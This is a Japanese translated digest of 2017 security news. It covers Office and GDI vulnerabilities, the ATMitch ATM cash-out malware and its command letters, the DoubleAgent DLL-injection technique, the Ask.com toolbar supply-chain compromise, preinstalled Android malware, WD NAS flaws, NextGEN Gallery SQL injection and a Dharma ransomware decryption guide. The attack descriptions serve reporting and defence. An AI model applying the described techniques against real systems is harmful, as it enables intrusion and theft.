     この攻撃は、Wordドキュメントを使用しているが、OLE2linkオブジェクトは、ExelやPowerPointのような他のOfficeパッケージソフトにも埋め込むこともできる。

    この0-Dayは、全てのWindowsとOfficeのバージョンに影響を与える

     McAfeeの専門家は、この脆弱性が、全てのWindowsオペレーティング システム上の全ての現在のOfficeバージョンに影響を与えると発言している。
     この攻撃ルーチンは、埋込み型マクロに依存していない。あなたがマクロで味付けをしてあるドキュメントに関する警告を見ていなくても、それはそのドキュメントが安全であることを意味していない。
     McAfeeもFireEyeも、この0-Dayを介してインストールされるマルウェアの詳細を提供していないが、0-Dayは、通常、国が支援する攻撃者の武器庫で発見される。


    ATMから現金を吐き出させる自己削除型マルウェア
    BleepingComputer : News>Security (2017/04/04)
     セキュリティ研究者が、今日最も洗練されたATM強盗の一つを明らかにした。これは、ファイルレス マルウェア(fileless malware)と、現金を吐き出させたら次に、自分自身を削除するATMマルウェアを使用して銀行のネットワークをハッキングすることを専門とするサイバー犯罪者グループに関連している。
     これらのATM強盗は、数年に渡り積極的に活動しているハッカー グループの仕事である。2016年に始まった、直近の活動では、このグループは、正当なWindowsアプリケーションと、少なくとも40ヶ国の政府機関や銀行をハッキングするためのファイルレス マルウェアを使用するように切り替えている。
     これらの攻撃は、感染したサーバ上に殆ど足跡を残すことのないステルス技術を使用しているため、犯罪者が操っているものを検出することができなかった。それであるにも拘わらず、彼等は、ハッカーが感染したシステムからデータ(ハッカーはどのようなデータなのか知らなかったが)を盗んだと疑った。

    ハッカーはATMシステムの制御を取得した銀行を晒した

     これらの攻撃に関する更なる手掛かりが、やっと最近になって明るみに出た。Kaspersky Labのセキュリティ研究者(今年二月の第一次攻撃を同定した人々)は、彼等が銀行をハッキングした目的の一部を明らかにしたと確信している。


    画像をクリックすると拡大表示されます。

     St. Maarten(【訳注】 セントマーチン島、カリブ海にある島)で近頃開催されたSecurity Analyst Summit (SAS)でのプレゼンで、Kaspersky Labの研究者は、犯罪者が、様々な悪用(彼等が正当なWindowsツールとシステムの程近くに彼等のアクセスを拡大するためのPowerShellマルウェアを使用する場所)を使用して様々な銀行のネットワークに侵入したと発言している。
     彼等のターゲットは、銀行のATMネットワークを管理するシステムであった。ハッカーは、RDP(Remote Desktop Protocol、リモート デスクトップ プロトコル)を介してATMに接続するために、このシステムのリモート管理機能を使用した。
     次に、彼等はこれらのマシン上に新種のATMマルウェア(これは、Kaspersky Labの専門家によってATMitchと名付けられた)を転送しインストールした。

    ATMitchマルウェアはATMに現金を吐き出させる

     このマルウェアは命令用の command.txt ローカルファイルを読むことによって動作する。命令は、command.txt ファイルの内部に存在している一文字の単純なものである。

    'O' - Open dispenser
    'D' - Dispense
    'I' - Init XFS
    'U' - Unlock XFS
    'S' - Setup
    'E' - Exit
    'G' - Get Dispenser id
    'L' - Set Dispenser id
    'C' - Cancel

     攻撃者が特定のATMの前に仲間がいることを認識すると、彼等は command.txt ファイルに命令をアップロードする。そして、このマルウェアは、命令を実行し、現金を吐き出させるだろう。ログ エントリに基き、このATMが "Catch some money, bitch!" という言葉を、その画面上に表示したと、研究者は確信している。

    襲われるATMを見つけ出すことは殆ど不可能

     このマルウェアは攻撃が終了すると自分自身を削除し、ファイルの全てを処分するので、攻撃者が、このテクニックを使用して、どのくらいの数のATMを空にしたのかは分かっていない。
     分かっているのは、一台のATM上で、このマルウェアが tv.dll と名付けられたファイルを削除し忘れた偶然によるものだけである。更に掘り下げた後、研究者は、このマルウェアが動作する方法を発見し、彼等がこの二月に明らかにした同じグループによってセキュリティ侵害された銀行に辿り着くことができた。
     現時点では、研究者はATMitchでの二つの重大事件(ロシアとカザフスタンで一つづつ)しか見つけ出していないが、彼等はもっと多く発生していると確信している。
     唯一の問題は、ハッキングされた銀行もしくはハッキングされたATMの何れかを検出することが殆ど不可能なことである。これは悪意ある挙動の殆どが、自己削除型マルウェアとメモリ中で実行される悪意あるPowerShellスクリプトを介して実行され、ディスク上に如何なる人為的な結果も残していないためである。銀行のサーバ / コンピュータあるいはATMが再起動されると、手掛かりの殆どはメモリから削除される。
     ATMitchは、キャッシュディスペンサを空にするようにATMを強いる最初のATMマルウェア株ではない。他に知られているウィルス株としては、GreenDispenser、Aliceの最近のバージョン、Ploutus ATMマルウェアがある。


    LastPassに未だ修正されていない未公開の重大な脆弱性
    GrahamCluley : News (2017/03/30)
     人気のパスワード管理企業LastPassが、現在、そのブラウザ拡張中のクライアントサイドの脆弱性の修正プロセス中にある。これは、セキュリティ研究者がResponsible Disclosure(【訳注】 ソフトウェアベンダー等から修正プログラムが公開されるまで、つまり利用者が対策を実施できるようになるまでは、情報公開を行わない事が最も安全である、という考え方(Microsoft TechNetより))したものである。
     03月24日の週末に渡り、Googleの脆弱性研究者Tavis Ormandyは、LastPassパスワード マネージャ用のブラウザ拡張中に、コード実行を達成するための方法を発見したとツイートした。
     アンチウィルス製品中に多くのフローを発見してきたOrmandyは、(今回)脆弱性攻撃がどのように動作するのかを公に発表しないことによってResponsible Disclosureの倫理に固執した。
     代わりに、Ormandyは直接LastPassに接触した。
     次に、数年に渡りセキュリティホールを修正してきたこのパスワード マネージャは、Ormandyの公表を公に認めるために二日間を要した。彼等は、この悪用の詳細に関しては何も発表していない。
     LastPassはブログで以下のように説明している:

     「我々は現在、積極的にこの脆弱性を解決中である。この攻撃は、一意であり極めて高度である。我々は、この脆弱性に関する具体的なことや、高度ではない邪悪な団体に対して何らかのことを明らかにすることになるであろう我々の修正を公開しようとは思わない。そこで、この作業が終了するまで、あなたは自己分析の詳細を得ることはできないだろう。」
     「他方、我々は、LastPassのオンラインセキュリティの水準を引き上げることを支援し、LastPassを市場で最も安全なパスワード マネージャにしようとし続けている我々のチームと共同作業したTavisのような人々に感謝したい。」

     ベンダが、Responsible Disclosureを介して彼等のセキュリティを改善するために支援する研究者に感謝しているのを見るのは常に嬉しいことである。全ての企業が、このように丁寧に対応しているわけではない。一部の企業は、彼等が最善を尽くすことが、誠実な方法でセキュリティを進歩させるとして研究者を締め出している
     LastPassは現在、Ormandyによって公開された脆弱性を修正するための作業中である。LastPassに関して悩むより、この研究者によって発見された他のセキュリティ上の脆弱性がパッチされた数日後に、このセキュリティホールだけが通知されたことを心に描いてみよう。
     作業中であるが、LastPassは、ユーザに三つのことを実行するように推奨している。

     一つ目、ユーザは、ブラウザ拡張からではなく、LastPassの金庫室から直接サイトを起動するように促している(LastPassのスマートフォン アプリケーション バージョンは影響を受けないと考えられている)。
     二つ目、ユーザの証明書をフィッシングしようとする疑わいいリンクやeMail添付ファイルに目を光らせるようにユーザに忠告している。
     三つ目、この機能を提供しているありとあらゆるアカウントに二段階認証を実装するように顧客にアドバイスしている。


    アンチ-ウィルス ソフトウェアをハイジャックするためにMicrosoftのアプリケーション ベリファイアを使用する新しい攻撃
    BleepingComputer : News>Security (2017/03/17)


    DoubleAgent攻撃で改竄されたNortonアンチウィルス ユーザ インターフェース

     Cybellumの研究者によって発見されDoubleAgentと名付けられた新しいテクニックは、攻撃者がセキュリティ製品をハイジャックし、それらに悪意ある行動を取るようにすることを可能にするものである。
     DoubleAgent攻撃は、他のアプリケーションの内部に悪意あるコードをロードするためにMicrosoftのアプリケーション ベリファイアを悪用する方法を、Cybellumの研究者が発見したことで明らかになった。

    DoubleAgent攻撃はMicrosoftのアプリケーション ベリファイアを悪用している

     Microsoftアプリケーション ベリファイアは、開発者がランタイムにコードのエラーを検証するためのツールである。このツールは、全てのWindowsのバージョンに搭載されており、開発者がチェックしたいアプリケーション内部でDLLをロードすることによって動作する。
     Cybellumの研究者は、開発者がMicrosoftが公式に提供しているアプリケーション ベリファイアの代わりに、開発者独自の"verifier DLL"をロードできることを発見した。
     単純にWindowsレジストリ キーを作成することで、攻撃者はハイジャックしたいアプリケーションを指定し、次に、正規のプロセス中に挿入したい攻撃者独自のペテン用のDLLを提供することが可能になる。
     幾つかのアンチウィルス メーカーが影響を受けている。
     Cybellumの研究者は、今日のセキュリティ製品の大部分がDoubleAgent攻撃の影響を受けやすい状態にあると発言している。影響を受ける製品のリストは以下である。

      Avast (CVE-2017-5567)
      AVG (CVE-2017-5566)
      Avira (CVE-2017-6417)
      Bitdefender (CVE-2017-6186)
      Trend Micro (CVE-2017-5565)
      Comodo
      ESET
      F-Secure
      Kaspersky
      Malwarebytes
      McAfee
      Panda
      Quick Heal
      Norton

     「我々は90日以上前に全てのベンダに対してDoubleAgentについて通告し、そして、幾つかのベンダと共同作業した」と、Michael Engstler(CybellumのCTO)は、Bleeping Computerへのメール中で発言している。
     記述している時点で、「パッチをリリースしたベンダは、Malwarebytes (バージョン番号: 3.0.6 Component Update 3), AVG (バージョン番号: 16.151.8007), Trend-Micro(まもなくリリースされる) 」と、Engstlerは付け加えている。

    DoubleAgentはセキュリティ製品をマルウェアに変える

    DoubleAgent攻撃は、セキュリティ製品をハイジャックし、効果的に無効化するので、極めて危険である。攻撃者のスキル レベルに応じて、攻撃者は、悪意あるコードをロードするために、以下のようにしてDoubleAgentフローを使用している。

      ・ セキュリティ製品をOFFにする
      ・ セキュリティ製品を特定のマルウェアや攻撃に対して識別不能にする
      ・ ローカル コンピュータ / ネットワーク上で攻撃を起動するためにセキュリティ製品をプロキシのように使用する
      ・ 全ての悪意あるコードのユーザ特権レベルを昇格させる(セキュリティ製品は一般的に最高の特権で稼働している)
      ・ 悪意あるトラフィックを隠蔽したり、あるいは、データをコッソリ持ち出すためにセキュリティ製品を使用する
      ・ OSやコンピュータにダメージを与える
      ・ DoS(Denial of Service)を発生させる

     計画的に、DobuleAgent攻撃は、コード挿入テクニックと永続的メカニズムの両方である。これは、レジストリキーのおかげで、攻撃者がブート毎にターゲットプロセスに悪意あるDLLを再挿入することが可能なためである。

    DoubleAgent攻撃は全てのソフトウェアに影響を与える

    Cybellumチームが、アンチウィルス ソフトウェアに関する研究に焦点をあてていたとしても、DoubleAgentをセキュリティ製品のみへの脅威として考えてはならない。
     DoubleAgentが悪用している脆弱性(取り分け、あらゆるプロセスへのコード挿入の能力)は、DoubleAgentを、Windows OSそれ自体を含むあらゆるアプリケーションに対する脅威にしている。
     このフローを発見し、セキュリティ ベンダの製品にパッチをあてるために、セキュリティ ベンダと共同作業したEngstlerは、DoubleAgentは、万人に対する脅威であると発言している。
     「この脅威は、あらゆるアプリケーション(オペーレーティング システムそれ自体さえ)をハイジャックするために使用することができる」と、「如何なる形であれ、我々のPOC(Proof-of-Concept、概念の実証)コードを変更する必要はなく、要求されたアプリケーション名で、それを実行するだけである。そこで、DoubleAgentは、自動的に、そのアプリケーションを攻撃するだろう。そのアプリケーションがアンチウィルスであろうと別のアプリケーションであろうと、それは重要なことではない」と、このエキスパートはBleepingComputerに告げている。
     彼が言及しているProof-of-Concept(概念の実証)コードは、GitHubで利用可能である。この攻撃を詳細に説明しているブログ ポスト(一般的な、そして、テクニカル レベル)は、明日(3月22日)、公開されるだろう。コチラのYouTubeビデオ(DoubleAgent Zero-Day Attacking Norton Antivirus)は、活動しているDoubleAgent攻撃を示している。
     Cybellumは、セキュリティ ベンダがMicrosoftのProtected Processesメカニズムを使用するように推奨している。この機能は、MicrosoftによってWindows 8.1 で導入された。
     Protected Processesは、Microsoftがアンチ-マルウェア サービス用に特別に設計したセキュリティシステムである。そして、Protected Processesは、アンチ-マルウェアのプロセスをラッピングし、他のアプリケーションに未署名のコードが挿入されることを許可しないように動作する。
     全てのセキュリティ製品の内、唯一Windows Defenderだけが、現在Protected Processesを使用している。


    Ask.comツールバー ネットワークが二ヶ月で二回セキュリティ侵害されていた
    BleepingComputer : News>Security (2017/03/17)
     Ask Partner Network(APN)は、サイバー犯罪者に、Ask.com Toolbarを稼働しているコンピュータにマルウェアを配布する方法を発見されたことにより、二ヶ月で二回セキュリティ侵害されていた。
     最初の攻撃は、2016年10月の終わりと11月の初めに発生し、Red Canaryのセキュリティ研究者達によって発見された。2回目は12月に発生した。これは、APNがネットワークをクリーンにし、Carbon Blackセキュリティ製品で増強した後のことであった。
     二つのインシデントは、攻撃者がAPNネットワークを破り、Ask.comツールバー アップデート プロセスをハイジャックする方法を発見したということでは類似のインシデントである。そして、これは影響を受けたコンピュータにマルウェアをインストールされる結果となった。

    攻撃者は、Ask.comツールバー アップデート プロセスをハイジャックしていた

     最初の攻撃では、サイバー犯罪者は、悪意あるプロセスを生み出すためにPNGファイルを使用したアップデートパッケージをダウンロードしインストールするためにAsk.comツールバー アップデート プロセスを改竄した。
     この幾分か基準外の挙動は、この攻撃を検出し警告を発したRed Canaryによって感知されたが、これはサイバー犯罪者が凡そ10人の犠牲者をセキュリティ侵害した後のことであった。
    APNは、彼等のネットワークに介入し、クリーンにし、サイバー犯罪者が悪意あるアップデート パッケージに署名するために使用されていたデジタル証明書(彼等の名前で発行されていた)を無効にした。次に、APNは、以降のアップデートの署名用の新しいデジタル証明書を発行した。

    二回目の攻撃は犠牲者のPCにRATをインストールした

     Carbon Blackの研究者達は、攻撃者が、何らかの方法で、この新しいデジタル証明書を手に入れ、二回目の悪意あるアップデートプロセスに署名するために、それを使用したと発言している。
     新たな攻撃は、12月16日に起動され、サイバー犯罪者は同一のオペレーション モード(Ask.com Toolbarユーザに悪意あるアプデートを送信する)を使用した。この悪意あるアップデートがインストールされると、犠牲者のコンピュータにリモートアクセス トロイ(RAT、【訳注】 ネズミのように見えないところで活動していることから、広義には遠隔操作を可能にするツール全般を意味するが、狭義にはトロイの木馬型(またはバックドア型)マルウェアを指す(ESET-キャノンITソリューションズより))をダウンロードしインストールする。
     一台の犠牲者のPCのログに基づくと、攻撃者は犠牲者のコンピュータ上でリバース コマンドシェルを開くために、このRATを使用したと、Carbon Blackは発言している。この全ては、悪意あるアップデートが配布された後、60秒で発生していた。
     Ask.com Toolbarは、システム権限で実行されているため、攻撃者は彼等が好む如何なるソフトウェア、如何なるコマンドを実行しようと何の問題もなかった。
     その後の二時間の間に、攻撃者は犠牲者のコンピュータに新しいツールをダウンロードしていたとCarbon Blackは発言している。攻撃者は、ローカルネットワークに関するリソースを列挙し、ローカルシステムから証明書をダンプし、盗んだ証明書を使用して他のシステムにラテラルに移動し、将来のアクセスを目的とする永続的メカニズムを構築するために、これらのツールを使用したと、Carbon Blackは発言している。

    新たな攻撃は検出されていない

     この二回目の攻撃で使用されたRATは、最初の攻撃の後に発行されたAPN認証で署名されていた。これは十中八九、最初の攻撃の後にエンジニアがサーバーをクリーンにした後も、攻撃者がAPNネットワーク上に足掛かりを維持していたことを意味している。
     この三ヶ月間APNネットワークから新しい悪意ある攻撃が検出されていないと、Carbon Blackがレポートしているので、今度こそ、APNはより適切な仕事をしているようである。


    3ダース余りの様々なAndroidデバイスにプレインストールされたマルウェアが発見された
    GrahamCluley : News (2017/03/13)
     個人情報取得マルウェア、粗末な広告ネットワーク形式のマルウェア、身代金要求型マルウェアもが、3ダース余りの異なるモデルのAndroidデバイスにプレインストールされていた。
     Check Pointの研究者達は、電気通信会社や多国籍テクノロジー企業による38のAndroidデバイス(【訳注】 3/13 のCheck Pointのアップデートで36に減少)上のマルウェアに気づいた。
     影響を受けるデバイスは以下。

      Galaxy A5
      Galaxy Note 2
      LG G4
      Galaxy S7
      Galaxy S4
      Galaxy Note 4
      Galaxy Note 5
      Galaxy Note 8     (【訳注】 3/13のアップデートで、8.0に変更された)
      Xiaomi Mi 4i
      ZTE x500
      Galaxy Note 3
      Galaxy Note Edge
      Galaxy Tab S2
      Galaxy Tab 2
      Oppo N3
      vivo X6 plus
      Nexus 5     (【訳注】 3/13のアップデートで削除された)
      Nexus 5X     (【訳注】 3/13のアップデートで削除された)
      Asus Zenfone 2
      LenovoS90
      OppoR7 plus
      Xiaomi Redmi
      Lenovo A850

     スマートフォンやコンピュータのような電子デバイス ベンダは、ROMに格納したデータと共に製品を出荷している。ROM(read-only memoryの頭文字)は、電源がOFFの場合でさえデータを維持するストレージ媒体である。従って、BIOS(basic input and output instructions)やファームウェア アップデートのような重要な情報を保管するために使用される。
     プレインストールされたマルウェアに関しては、この悪意あるソフトウェアは通常ROMに搭載されて出荷される。しかし、これは必ずしもベンダーに責任があることを意味していない。Check Pointのチームはブログ ポストで、この点を詳細に述べている

     「この悪意あるソフトウェアは、ベンダによって提供される公式のROMの一部ではなく、流通過程の何処かで追加されたものである。このマルウェアの内の6つは、悪意に満ちた役割を持つ者によってシステム権限を使用してデバイスのROMに追加されている。これは、ユーザによって削除することができず、デバイスのROMを焼き直す必要があることを意味している」

     では、プレインストールされたマルウェアは何を実行するのか?
     大部分の望ましくないソフトウェアは、情報を盗むか、悪意ある広告ネットワークの何れかである。例えば、Lokiマルウェアの変種は、感染したデバイスを悪用して不正な広告を表示し、このマルウェアの所有者に収益をもたらそうとする。このマルウェアはまた、個人情報を盗み、永続性を勝ち取ることを可能にするために、それ自身をシステムにインストールする。
     しかしながら、この群の中に幾つかの例外がある。特に、研究者達はSlockerの一つのインスタンスに着目している。これはAES暗号化を用いてデバイスのファイル全てを暗号化し、復号キーのために身代金を要求するモバイル身代金要求型マルウェアである。
     これらの脅威に対する論点のはぐらかし: マルウェアのプレインストール今に始まったことではないので、ユーザはそれに対して自分自身を保護するために、あらゆることを実行することができる。
     簡単な答え: 最善の策は、最終的に購入を決定する前にデバイスとベンダを完全に研究することである。デバイスを決定したら、サードパーティーの販売者からではなく、直接ベンダから購入することである。
     これで、プレインストールされるマルウェアに対する保護責任はベンダ側に存することとなる。組織は、デバイスの供給業者に順守監査を実施することで、彼等のサプライチェーンを安全にする必要がある。最小権限のモデルを使用することや、契約者の役割を分離することは、悪い考えではない。


    Western DigtalのNASハードドライブに複数の未パッチの脆弱性が発見された
    BleepingComputer : News>Security (2017/03/02)
     複数のWestern Digtal MyCloud Networked Attached Storage Device(NAS、ネットワーク接続ストレージ デバイス)は、酷さは異なるものの幾つかのセキュリティ フロー(攻撃者が認証をバイパスすることが可能、そのデバイス上でコードの実行が可能、ユーザのデータをアップロードしたりダウンロードすることが可能)の影響を受ける。
     これらのセキュリティ フローは、Zenofexと名乗るセキュリティ研究者によって発見され、Western Digitalには通知されておらず、未パッチのままであり、公開された悪用コードは、その半分を超える脆弱性に利用可能である。

    影響を受ける複数のMyCloudモデル

     Zenofexによると、影響を受ける複数のWD MyCloud NASデバイス モデルは以下である。

      My Cloud
      My Cloud Gen 2
      My Cloud Mirror
      My Cloud PR2100
      My Cloud PR4100
      My Cloud EX2 Ultra
      My Cloud EX2
      My Cloud EX4
      My Cloud EX2100
      My Cloud EX4100
      My Cloud DL2100
      My Cloud DL4100

     ZenofexがWestern Digitalに通知しないことの決定は、他のインフォセック専門家達が、報告された脆弱性をWestern Digitalが無視していることに不平不満をぶつけた、昨年のセキュリティ カンファレンスに、この研究者が出席した後のことである。
     同じカンファレンス(Black Hat USA 2016)で、Western Digitalは、"Lamest Vendor Response"(最も不十分なベンダ対応)でPwnie Award(【訳注】 オニー賞、セキュリティ分野などの不名誉を表彰するジョーク的な賞。2011年にはSONYが受賞)を受賞している。
     「これらのバグを無視することは、責任ある対応がなされるまでの長期間に渡り脆弱性あるデバイスをオンラインに放置することである」と、Zenofixは、Western Digitalが、このセキュリティバグをパッチするのを待たずに公開を決定した論拠としている。
     「我々はフローのコミュニティに警告することを試みる代わりに、可能な限りアクセスを制限するために、ユーザが彼等のネットワークの公に直面する部分から彼等のデバイスを切り離すことを希望する」と、彼は追加している。

    発見された85のセキュリティ フロー

     Exploitee.rsコミュニティのメンバーであるZenofexは、とてつもなく大きな全部で85のセキュリティ ホールを発見したと発言している。概念の証明コードは、Exploitee.rs Wikiで、これらの脆弱性の48に関して利用可能である。
     この弱点を突くコードに基づくと、これらのセキュリティフローの多くは、クッキーの値を変更することによって、あるいは、クッキー パラメータ中にシェルコマンドを埋め込むことによって悪用することができる。
     より複雑な攻撃のシナリオは、MyCloud NAS所有者が訪問する可能性のあるWebサイト上のImageタグ内部に悪意あるコードを埋め込むことを含む。訪問者のブラウザ内部に画像がロードされると、この悪意あるコードは、ロカルNASドライブに対して実行され、このデバイスを乗っ取る。
     nuit によるTweetはコチラ
     Zenofexによると、これらの問題の内、最も深刻なのは、認証のバイパス問題である。そして、皮肉にも、クッキー セッション パラメータの改善だけしか要求しない最も簡単に悪用できる脆弱性である。
     皮肉にも、Zenofexがログイン バイパス問題を調査している間に、Western Digitalは、そのログイン メカニズムに新たなバグを導入したMyCloudファームウェアのアップデートをリリースした。この新たなログイン メカニズムのバグは、攻撃者がクッキー パラメータを介してシェル コマンドを埋め込むことで、ログインメカニズムを使用するコードを実行することができる。
     この特定の問題は深刻であり展開してはいるものの、他のフローを無視してはならない。一部は、MyCloudデバイス上でシェルコマンドを実行する権利を攻撃者に許諾するので、リモートコード実行を可能にしている。  そして、マーフィーの法則が同様にハードウェア デバイスに適用されている間は、物事は全て間違った方向に進む。コマンドは限定されたユーザ権限では実行されない、しかし、ルート権限では実行され、攻撃者に影響を受けるデバイスの完全制御を与え、気の向くままにデータをアップロードしたりダウンロードしたりすることを可能にする。
     これが、Zenofexによって記録された、活動中の幾つかのセキュリティフローを示したビデオである。


    サードパーティのベンダがWindows GDI脆弱性用の臨時のパッチをリリースした
    BleepingComputer : News>Security (2017/03/02)
     Google Project Zeroのセキュリティ研究者によって発見され、Microsoftがパッチしないまま放置している脆弱性に関して、サードパーティのセキュリティ ベンダACROS Securityが臨時のパッチをリリースした。
     CVE-2017-0038で追跡されるこの脆弱性は、Windows GDIライブラリ中のバグである。これは、ビデオ ディスプレイとローカル プリンタにデータが送信されている時の両方で、Windowsがグラフィックスとフォーマットされたテキストを処理するために使用するライブラリである。
     Googleの研究者によると、攻撃者は、犠牲者のメモリ中に発見されたデータを暴くために悪意あるEMFファイルを活用することができる。これは次に、ASLRプロテクションをバイパスし、ユーザのコンピュータ上でコードを実行するために活用される。
     「私は、この脆弱性がInternet Explorer中でローカルに、Office Onlineでリモートに、特別に細工されたEMFファイルを含む .docx ドキュメントを介して再現されることを確認した」と、このバグを発見したGoogleのエンジニアMateusz Jurczykは説明している。

    この問題はMicrosoftが2月の定例パッチを延期したので未パッチのまま残されている

     この問題は、昨年Microsoftに通知され、2016年06月にパッチ(MS16-074)されたという事実がある。このパッチをテストしたJurczykは、彼の当初のレポートで、通知した問題を完全に修正することに、このパッチは失敗していたので、昨年11月、Microsoftに対して、この問題を改めて提示したと発言していた。
     Jurczykは、90日間(Googleが製品を安全にするために企業に与えている標準猶予期間)待ち、次に、彼の二度目の発見を公開した。
     彼のアナウンスは、Microsoftが2月のセキュリティアップデートを来月のパッチの火曜日(03月15日にスケジュールされている)まで遅延した後に出現している。

    ACROS Securityは、臨時のパッチを配布している

     その間に、ACROS Securityは、0patch(0-Day、未パッチの脆弱性、期限切れ、サポートされていない製品、時代に合わなくなったOS、脆弱性のあるサードパーティー コンポーネント、カスタマイズされたソフトウェアに修正を適用するためのプラットフォーム)と呼ばれる製品を経由してWindowsコンピュータに適用することのできる臨時のパッチを発行した。
     このパッチは、0patch Agentクライアントを介して無料で適用される。このパッチは閲覧可能でありコチラからダウンロード(直リンク)することができる。
     このパッチは、以下のプラットフォーム(Windows 10 64bit, Windows 8.1 64bit, Windows 7 64bit, Windows 7 32bit)で利用できる。
     「最も深刻な問題というわけではないが、私は、(テストで使用された)虹の画像の代わりに、悪意あるページが私のオンライン バンキング アカウントへの証明書を盗むことができたり、あるいは、私のブラウザのメモリから、昨晩のパーティー後の私の写真を掴み取ることができると考えると身震いがする」と、0patchチームのメンバーLuka Treiberは発言している。
     「此処で留意すべきは、Microsoftのアップデートが、この問題を修正し、脆弱性のあるgdi32.dllが置き換えられると、我々のパッチは、このDLLの脆弱性のあるバージョンに正確に結び付けられているので、自動的に適用は中止される」と、Treiberは付け加えている
     CVE-2017-0038への攻撃がパッチの前後で、どのように挙動するかを示すビデオは以下で利用可能である。

    https://youtu.be/LWx3mERvgdo

    Windows GDI問題とは別に、Google Project Zeroの研究者達は、二つ目の未パッチのMicrosoftの脆弱性の詳細を公開した。この問題は、EdgeとInternet Explorerに影響を与える。


    Kasperskyが、Dharma身代金要求型マルウェア用の復号プログラムをリリース
    BleepingComputer : News>Security (2017/03/02)
     昨日、私はDharma身代金要求型マルウェア用のマスター復号キーと主張するものが BleepingComputer.com のフォーラムに投稿されたことを記述した。これはCrysis(Dharmaはこれに基づく)用のキーがリリースされたのと同じ方法で実行された。
     Kasperskyは、このキーをテストし、本物でありDharmaがファイルを暗号化するために使用したものであると決定した。これらのキーは、彼等のRakhniDecryptor中に導入された。そして、私は、この復号プログラムをDharma感染に対してテストし、完全に動作することを確認した。
     Dharma身代金要求型マルウェアに感染し、依然として暗号化されたままのファイルを持っている人々のために、この感染の犠牲者は、以下のガイドを使用して、無料でファイルを復号することができる。ファイルを復号するにあたり支援を必要とするのであれば、遠慮無くDharma Ransomware Help & Support Topicで質問しなさい。
    アップデート 2017/03/02、午前10:08(米国東部時間)
     この記事を投稿した直後に、私は、ESETがDharma身代金要求型マルウェアをサポートするように復号プログラムのアップデートをリリースしたことを確認した。詳細情報はコチラ

    RakhniDecriptorを使用してDharmaで暗号化されたファイルを復号する方法

     Dharma身代金要求型マルウェアの犠牲者は、彼等のファイルが暗号化され、[filename].[email_address].dharma のフォーマットにリネームされていることで、Dharma身代金要求型マルウェアの犠牲者であることを特定できる。例えば、最近の変種は、ファイル名 test.jpg を test.jpg.[tombit@india.com].dharma にリネームし暗号化する。暗号化されたファイルの例は、以下に見られる。


    Dharmaで暗号化されたファイル

     今までに確認された他の変種の一部は、以下を含んでいる。

    .[3angle@india.com].dharma
    .[amagnus@india.com].dharma
    .[base_optimal@india.com].dharma
    .[bitcoin143@india.com].dharma
    .[blackeyes@india.com].dharma
    .[doctor.crystal@mail.com].dharma
    .[dr_crystal@india.com].dharma
    .[emmacherry@india.com].dharma
    .[google_plex@163.com].dharma
    .[mr_lock@mail.com].dharma
    .[opened@india.com].dharma
    .[oron@india.com].dharma
    .[payforhelp@india.com].dharma
    .[savedata@india.com].dharma
    .[singular@india.com].dharma
    .[suppforhelp@india.com].dharma
    .[SupportForYou@india.com].dharma
    .[tombit@india.com].dharma
    .[worm01@india.com].dharma

    Dharma身代金要求型マルウェアで暗号化されたファイルを復号するには、RakhniDecryptor をダウンロードする(直リンク)必要がある。ダウンロードしたら、このプログラムを解凍し、実行する。この復号プログラムが起動すると、以下に示すメイン スクリーンが表示される。


    RakhniDecryptor

     始める前に、あなたが必ずバージョン 1.17.17.0 を使用していることを保証しなさい。このバージョンが、Dharma身代金要求型マルウェアをサポートしている。RakhniDecryptorのバージョンを確認するには、上の画面の左下にある About ボタンをクリックしなさい。これは RakhniDecryptorのバージョンを示す小さなウィンドウを表示する。


    バージョンを表示する About 画面

     あなたがバージョン 1.17.17.0以降を使用しているのであれば、Start scanボタンをクリックしなさい。そうすると、RakhniDecryptorは、暗号化されたファイルを選択するように促してくる。Dharmaで暗号化されたファイルを含むフォルダに移動し、.Word, Excel, PDF, music, imageファイルを選択しなさい。テキスト ファイルは残りのファイルを復号するために使用することができないので選択しないようにしなさい。


    Dharmaで暗号化されたファイルを選択する

     ファイルを選択したら、Openボタンをクリックする。これで、RakhniDecryptorは、暗号化されたファイルに関してコンピュータ全体をスキャンし、それらを復号する。


    Dharmaで暗号化されたファイルをスキャン中

     このプロセスには、かなりの時間がかかるので、この復号プログラムが、あなたのコンピュータをスキャンし、ファイルを復号するまで辛抱しなさい。
     終了したら、以下のような完了画面が表示される。


    復号完了

     ここで、この復号プログラムで復号されたDharmaファイルの完全なリストを確認するために、detailsリンク(上図のProcessed行の右端)をクリックしなさい。


    スキャン結果のページ

     ここで、RakhniDecryptorを終了する。あなたは再びファイルにアクセスできるはずである。
     あなたのファイルが復号された場合でさえ、オリジナルの暗号化されたファイルは残ったままになっていることに注意しなさい。


    復号されたファイルが存在するフォルダ

     バックアップされている暗号化されたファイルを掃除するには、この暗号化されたファイルを、アーカイブもしくは削除しても差し支えない別のフォルダに移動するためにCryptoSearchを使用しなさい。


    100万を超えるWebサイトがWordPress Galleryプラグインのフローのリスクがある
    The State Of Security : News (2017/03/02)
     NextGEN Galleryは、自己ホスト型WordPress Webサイトで大変人気のあるプラグインであり、1650万回ダウンロードされている。
     このソフトウェアの幅広い人気(2007年以来、「業界標準のWordPressプラグイン」であると主張している)は、彼等のサイトにイメージ ギャラリーを追加することに関心を持っているWebサイトのオーナーにとって、一見して明らかな選択肢になっている。
     Sucuriの研究者達は、NextGEN Galleryのコードに、ハッシュされたパスワードやWordPress秘密鍵のような重要な情報を盗むために、悪意ある攻撃者が使用することのできる深刻なSQL挿入の脆弱性があることを明らかにした。

     この脆弱性は、少なくとも二つのシナリオで攻撃者が悪用することができる。
       ・ あなたのサイトで NextGEN Basic TagCloud Gallery を使用している場合、もしくは、
       ・ あなたのユーザ(寄稿者)がレビューしてもらうための投稿を可能にしている場合
     これらのケースの何れかに該当する場合、あなたは明らかにリスクがある。
     この問題は、NextGEN Galleryが、SQLクエリーを用意しているWordPressでサニタイズされた(【訳注】 入力されたデータの危険な部分を無力化する操作)ユーザ インプットを不適切に許可しているために存在していた。これは、基本的に、生のSQLクエリー内部にユーザインプットを追加することと同じである。この攻撃ベクトルを使用して、攻撃者は、ハッシュされたパスワードや、或る形態のWordPress秘密鍵をリークすることが可能になる。

     幸いなことに、このセキュリティの脆弱性は、このプラグインのバージョン2.1.79でパッチされている。もちろん、 Imagely(NextGEN Galleryプラグインの開発者)が、修正したバージョンをリリースしたからといって、この話が終わるわけではない。
     影響を受けるWebサイトは、彼等のWordPressプラグインのバージョンがアップデートされていることを保証する必要がある。
